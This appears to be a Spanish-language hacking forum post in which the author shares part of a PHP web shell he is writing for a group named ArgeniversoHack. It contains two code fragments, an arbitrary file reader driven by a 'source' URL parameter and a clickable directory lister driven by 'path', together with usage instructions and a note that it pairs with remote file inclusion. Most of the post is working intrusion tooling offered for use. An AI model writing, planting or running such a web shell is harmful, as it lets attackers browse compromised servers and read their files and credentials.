Bien, aquí os dejo una parte de una WebShell que estoy codeando para ArgeniversoHac
k:
<?php
if(isset($_GET['source'])){
$source=explode('/',$_GET['source']);
$sourceb=array_reverse($source);
$asf=$_GET["source"];
echo '<div style="top: 123%"><textarea cols="100" rows="30" READONLY color=red>';
@$lectura=fopen($_GET['source'],'r');
@$lectura=fread($lectura,filesize($asf));
/*Esto es imrpotante, así evitamos ejecutar html */
echo htmlentities($lectura);
echo '</textarea></div><!--';
exit();
}
?>
El archivo que queramos ver, debe de estar en nuestro servidor (a menos que sea un RFI
). Simplemente pondríamos nuestroarchivo
.php?source=AquirutaYaRcHiVo
Esto viene bien unido a un listador de archivos...:
<?php
if($_GET['path']==""){
$lala=dirname($lugarshell);
@$directorio=dir($lala);
$ruta=$lala;
}
else{
@$directorio=dir($_GET['path']);
$ruta=$_GET['path'];
}
?>
<?php
$path="$ruta";
$directorio=dir($path);
echo "<br><br>";
while ($archivo = $directorio->read())
/* Con esto voy a intentar hacer que cuando sea un directorio, haga ?path, para ir a ese directorio*/
{
$extension=filetype($ruta.'/'.$archivo);
if ($extension=="dir"){
echo "<font color=red><b>(<a href=?path=$ruta/$archivo>$archivo</a>)</b></font><br>";
}
/* Y si en vez de ser un directorio, es un archivo, vemos su Codigo Fuente =D */
else {
echo "<a href=?source=$ruta/$archivo>$archivo</a><br>";
}
}
$directorio->close();
echo "<br><br>";
?>
Es normal que las variables no sepais que son (como lugarshell). $lugarshell=$_SERVER[SCRIPT_FILENAME]
Bytes a todos.
Autor